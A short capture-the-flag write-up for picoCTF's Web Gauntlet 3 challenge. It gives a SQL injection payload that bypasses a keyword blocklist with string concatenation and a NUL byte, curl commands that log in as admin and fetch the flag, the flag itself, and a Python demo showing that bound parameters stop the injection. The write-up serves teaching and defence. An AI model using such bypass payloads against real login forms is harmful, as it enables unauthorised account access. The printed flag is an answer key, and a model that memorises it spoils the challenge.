Web Gauntlet 3
Last time, I promise! Only 25 characters this time. Log in as admin Site: Filter:
The solution to this challenge is completely identical to my solution to .
The solution query is user=ad'||'min'%00 and it can be sent using cURL like so:

    curl --data "user=ad'||'min'%00&pass=a" http://mercury.picoctf.net:32946/index.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" --output -

The flag can be retrieved using this command:

    curl http://mercury.picoctf.net:32946/filter.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" | grep picoCTF
. See for more information.
The code for the filter and the flag are shown in /filter.php when the login is bypassed:
picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0}
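
Why a keyword blocklist does not stop the input above while a bound parameter does, as an added example that is not part of the original writeup or the challenge's code. The table, query shape, blocklist contents and function names are assumed stand-ins, and the NUL handling models how SQLite's C API stops reading a statement at the first zero byte.

```python
import sqlite3

# Assumed stand-ins: the page does not show the real schema, query or filter.
BLOCKLIST = ("admin", "--", ";", " or ", "union")  # constructed keyword filter
MAX_LEN = 25                                       # limit from the challenge text

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def passes_filter(user, pw):
    joined = (user + pw).lower()
    return len(joined) <= MAX_LEN and not any(w in joined for w in BLOCKLIST)

def login_concat(db, user, pw):
    """Blocklist plus string-built SQL: input can still change the statement."""
    if not passes_filter(user, pw):
        return None
    sql = f"SELECT username FROM users WHERE username='{user}' AND password='{pw}'"
    # SQLite's C API stops at the first NUL byte. Model that here, because
    # Python's sqlite3 module rejects statement text containing NUL.
    sql = sql.split("\x00", 1)[0]
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_bound(db, user, pw):
    """Bound parameters: input is only ever a value, never SQL syntax."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (user, pw),
    ).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    user, pw = "ad'||'min'\x00", "a"  # the page's input after URL decoding
    print("concatenated:", login_concat(db, user, pw))
    print("bound:       ", login_bound(db, user, pw))
```

The blocklist also rejects the legitimate admin login in the concatenated version, which is a second reason to drop it in favour of bound parameters.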